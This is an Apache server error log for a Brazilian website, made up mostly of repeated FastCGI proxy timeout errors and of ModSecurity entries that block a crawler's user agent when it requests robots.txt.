[Tue Mar 17 00:46:28.037884 2026] [proxy_fcgi:error] [pid 2473:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36926] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:46:45.803130 2026] [:error] [pid 2325:tid 140411733534464] [client 74.7.244.31:58284] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjOpe82sZHvlq4xgHqO5QAAAoE"]
[Tue Mar 17 00:46:49.145804 2026] [proxy_fcgi:error] [pid 11469:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37054] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:47:11.127560 2026] [proxy_fcgi:error] [pid 11469:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37248] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:47:32.129784 2026] [proxy_fcgi:error] [pid 11469:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37388] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:47:53.129812 2026] [proxy_fcgi:error] [pid 2305:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:37518] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:48:14.145855 2026] [proxy_fcgi:error] [pid 2473:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37740] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:48:35.129932 2026] [proxy_fcgi:error] [pid 2325:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37922] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:48:56.121918 2026] [proxy_fcgi:error] [pid 2473:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38070] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:49:17.134453 2026] [proxy_fcgi:error] [pid 2305:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:38176] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:49:36.830450 2026] [:error] [pid 2304:tid 140411725141760] [client 74.7.228.16:38712] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjPUMh3JZxwdBQwPYHCGgAAAII"]
[Tue Mar 17 00:49:38.125803 2026] [proxy_fcgi:error] [pid 2325:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38302] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:50:00.137864 2026] [proxy_fcgi:error] [pid 2473:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:38432] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:50:21.133848 2026] [proxy_fcgi:error] [pid 2325:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:50:43.097837 2026] [proxy_fcgi:error] [pid 4740:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39094] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:51:09.108134 2026] [proxy_fcgi:error] [pid 2325:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39416] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:51:31.058248 2026] [proxy_fcgi:error] [pid 11293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39568] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:51:52.149813 2026] [proxy_fcgi:error] [pid 2305:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:39836] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:52:13.109971 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40284] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:52:14.627138 2026] [:error] [pid 2304:tid 140411683178240] [client 74.7.244.31:39234] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjP7sh3JZxwdBQwPYHCRAAAAIc"]
[Tue Mar 17 00:52:34.044474 2026] [proxy_fcgi:error] [pid 11469:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40528] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:52:55.133776 2026] [proxy_fcgi:error] [pid 2325:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40886] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:53:16.186149 2026] [proxy_fcgi:error] [pid 2304:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41218] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:53:37.146572 2026] [proxy_fcgi:error] [pid 2305:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41458] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:53:58.117649 2026] [proxy_fcgi:error] [pid 2325:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41636] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:54:19.130572 2026] [proxy_fcgi:error] [pid 2325:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41806] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:54:40.133828 2026] [proxy_fcgi:error] [pid 2304:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42110] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:54:58.909379 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.228.16:48978] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjQktCmCSWTlPouqoqYEgAAAMw"]
[Tue Mar 17 00:55:01.118000 2026] [proxy_fcgi:error] [pid 2304:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42258] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:55:22.126929 2026] [proxy_fcgi:error] [pid 11469:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42412] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:55:43.129927 2026] [proxy_fcgi:error] [pid 4740:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:42516] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:56:04.129781 2026] [proxy_fcgi:error] [pid 2325:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:42664] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:56:31.103429 2026] [proxy_fcgi:error] [pid 11469:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42914] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:56:52.129789 2026] [proxy_fcgi:error] [pid 11293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:43124] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:57:13.129888 2026] [proxy_fcgi:error] [pid 11293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:43300] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:57:17.869034 2026] [:error] [pid 4740:tid 140411607643904] [client 74.7.244.31:40880] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjRHQfYLcKp6Sb5AeIGMwAAAFA"]
[Tue Mar 17 00:57:34.134540 2026] [proxy_fcgi:error] [pid 2325:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43566] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:57:55.131583 2026] [proxy_fcgi:error] [pid 2473:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43762] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:58:16.069828 2026] [proxy_fcgi:error] [pid 2325:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:43950] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:58:37.125835 2026] [proxy_fcgi:error] [pid 2305:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44120] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:58:58.129797 2026] [proxy_fcgi:error] [pid 2305:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44292] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:59:19.149945 2026] [proxy_fcgi:error] [pid 11469:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:44512] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 00:59:40.057833 2026] [proxy_fcgi:error] [pid 2305:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:44700] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:00:01.070047 2026] [proxy_fcgi:error] [pid 11293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44900] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:00:10.128252 2026] [:error] [pid 2325:tid 140411666392832] [client 74.7.228.16:60484] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjRyu82sZHvlq4xgHqQNAAAAok"]
[Tue Mar 17 01:00:22.130265 2026] [proxy_fcgi:error] [pid 2304:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45058] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:00:43.133791 2026] [proxy_fcgi:error] [pid 11293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45210] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:01:04.133822 2026] [proxy_fcgi:error] [pid 2473:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:45394] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:01:25.129796 2026] [proxy_fcgi:error] [pid 2305:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:45572] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:01:53.133800 2026] [proxy_fcgi:error] [pid 2305:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:45952] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:02:06.703521 2026] [proxy_fcgi:error] [pid 2304:tid 140411691570944] [client 162.241.120.138:53726] AH01071: Got error 'Primary script unknown'
[Tue Mar 17 01:02:14.128354 2026] [proxy_fcgi:error] [pid 2304:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46138] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:02:36.137851 2026] [proxy_fcgi:error] [pid 2325:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:46348] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:02:57.129819 2026] [proxy_fcgi:error] [pid 2325:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46548] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:03:18.124915 2026] [proxy_fcgi:error] [pid 2325:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46714] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:03:40.129856 2026] [proxy_fcgi:error] [pid 2325:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:46818] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:04:01.122658 2026] [proxy_fcgi:error] [pid 2305:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:46978] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:04:22.125771 2026] [proxy_fcgi:error] [pid 4740:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47148] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:04:43.150409 2026] [proxy_fcgi:error] [pid 4740:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:47354] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:05:04.549397 2026] [proxy_fcgi:error] [pid 4740:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47558] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:05:26.125795 2026] [proxy_fcgi:error] [pid 4740:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47658] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:05:30.756571 2026] [:error] [pid 11469:tid 140411632822016] [client 74.7.228.16:35638] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjTCpDEJR9VXonE_-0YuQAAAQ0"]
[Tue Mar 17 01:05:47.126614 2026] [proxy_fcgi:error] [pid 4740:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47796] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:06:08.121195 2026] [proxy_fcgi:error] [pid 4740:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:47944] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:06:30.126411 2026] [proxy_fcgi:error] [pid 11469:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48108] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:06:51.125851 2026] [proxy_fcgi:error] [pid 2304:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48270] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:06:57.223838 2026] [proxy_fcgi:error] [pid 2305:tid 140411565680384] [client 138.68.109.37:48614] AH01071: Got error 'Primary script unknown'
[Tue Mar 17 01:07:15.123920 2026] [proxy_fcgi:error] [pid 11293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48586] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:07:36.141869 2026] [proxy_fcgi:error] [pid 2304:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48760] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:07:54.754120 2026] [:error] [pid 11469:tid 140411616036608] [client 74.7.244.31:33564] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjTmpDEJR9VXonE_-0Y3AAAAQ8"]
[Tue Mar 17 01:07:57.141940 2026] [proxy_fcgi:error] [pid 2473:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48950] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:08:19.129811 2026] [proxy_fcgi:error] [pid 11469:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49318] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:08:40.134677 2026] [proxy_fcgi:error] [pid 11469:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49718] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:09:02.046481 2026] [proxy_fcgi:error] [pid 2473:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49976] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:09:23.141833 2026] [proxy_fcgi:error] [pid 2305:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50168] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:09:44.150220 2026] [proxy_fcgi:error] [pid 4740:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:50384] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:10:05.129905 2026] [proxy_fcgi:error] [pid 4740:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50618] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:10:26.074391 2026] [proxy_fcgi:error] [pid 2305:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50714] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:10:41.824982 2026] [:error] [pid 11469:tid 140411582465792] [client 74.7.228.16:38120] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjUQZDEJR9VXonE_-0ZAgAAARM"]
[Tue Mar 17 01:10:47.125802 2026] [proxy_fcgi:error] [pid 11469:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50870] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:11:08.133838 2026] [proxy_fcgi:error] [pid 2325:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51014] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:11:29.085467 2026] [proxy_fcgi:error] [pid 2304:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51238] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:11:51.181500 2026] [proxy_fcgi:error] [pid 2473:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:51504] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:12:12.129784 2026] [proxy_fcgi:error] [pid 2473:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51638] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:12:34.129811 2026] [proxy_fcgi:error] [pid 2305:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:51780] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:12:57.077867 2026] [proxy_fcgi:error] [pid 2305:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:52002] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:13:15.255204 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.244.31:48668] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjU26BJNF7axNlVR0XM-QAAAA8"]
[Tue Mar 17 01:13:18.125052 2026] [proxy_fcgi:error] [pid 2473:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:52142] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:13:41.070195 2026] [proxy_fcgi:error] [pid 4740:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52318] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:14:03.123575 2026] [proxy_fcgi:error] [pid 2305:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52548] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:14:24.056191 2026] [proxy_fcgi:error] [pid 2325:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52740] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:14:46.137793 2026] [proxy_fcgi:error] [pid 11469:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52934] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:15:07.074489 2026] [proxy_fcgi:error] [pid 2305:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53152] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:15:28.142217 2026] [proxy_fcgi:error] [pid 2304:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:15:50.129826 2026] [proxy_fcgi:error] [pid 11469:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:53550] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:16:05.371947 2026] [:error] [pid 2305:tid 140411674785536] [client 74.7.228.16:36852] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjVhQQohV2v-7oj5HHNDAAAAYg"]
[Tue Mar 17 01:16:11.119625 2026] [proxy_fcgi:error] [pid 4740:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:53802] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:16:32.123240 2026] [proxy_fcgi:error] [pid 11469:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:53984] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:16:53.133844 2026] [proxy_fcgi:error] [pid 2304:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54162] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:17:14.133807 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:54438] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:17:36.049154 2026] [proxy_fcgi:error] [pid 11469:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:54618] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:17:57.121891 2026] [proxy_fcgi:error] [pid 11293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54820] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:18:18.125815 2026] [proxy_fcgi:error] [pid 2473:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55048] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:18:39.045869 2026] [proxy_fcgi:error] [pid 11293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55188] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:19:00.092259 2026] [proxy_fcgi:error] [pid 2325:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:55410] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:19:24.134421 2026] [:error] [pid 2325:tid 140411649607424] [client 74.7.244.31:38102] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjWTO82sZHvlq4xgHqSPAAAAos"]
[Tue Mar 17 01:19:25.127929 2026] [proxy_fcgi:error] [pid 11469:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55648] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:19:46.034106 2026] [proxy_fcgi:error] [pid 2325:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55874] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:20:07.133842 2026] [proxy_fcgi:error] [pid 2305:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56102] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:20:28.128042 2026] [proxy_fcgi:error] [pid 2305:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56316] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:20:49.057817 2026] [proxy_fcgi:error] [pid 2325:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56462] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:21:10.205085 2026] [:error] [pid 2304:tid 140411741927168] [client 74.7.228.16:35136] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjWtsh3JZxwdBQwPYHEZAAAAIA"]
[Tue Mar 17 01:21:11.123911 2026] [proxy_fcgi:error] [pid 2305:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56626] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:21:33.080636 2026] [proxy_fcgi:error] [pid 2304:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56850] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:21:54.129776 2026] [proxy_fcgi:error] [pid 2473:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:57010] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:22:15.065851 2026] [proxy_fcgi:error] [pid 2473:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57254] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:22:36.285837 2026] [proxy_fcgi:error] [pid 4740:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:57424] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:22:58.269830 2026] [proxy_fcgi:error] [pid 4740:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:57596] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:23:20.128353 2026] [proxy_fcgi:error] [pid 2325:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57802] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:23:41.138980 2026] [proxy_fcgi:error] [pid 2473:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57944] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:24:02.149828 2026] [proxy_fcgi:error] [pid 2305:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58078] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:24:23.113827 2026] [proxy_fcgi:error] [pid 2305:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:58218] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:24:33.974548 2026] [:error] [pid 4740:tid 140411599251200] [client 74.7.244.31:54972] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjXgQfYLcKp6Sb5AeIIXwAAAFE"]
[Tue Mar 17 01:24:47.118909 2026] [proxy_fcgi:error] [pid 2304:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58452] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:25:08.137820 2026] [proxy_fcgi:error] [pid 11469:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:58608] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:25:30.133822 2026] [proxy_fcgi:error] [pid 2304:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58718] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:25:51.057810 2026] [proxy_fcgi:error] [pid 2325:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58916] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:26:13.125843 2026] [proxy_fcgi:error] [pid 11469:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59084] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 01:26:32.205400 2026] [:error] [pid 4740:tid 140411716749056] [client 74.7.228.16:57684] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abjX-AfYLcKp6Sb5AeIIdQAAAEM"]
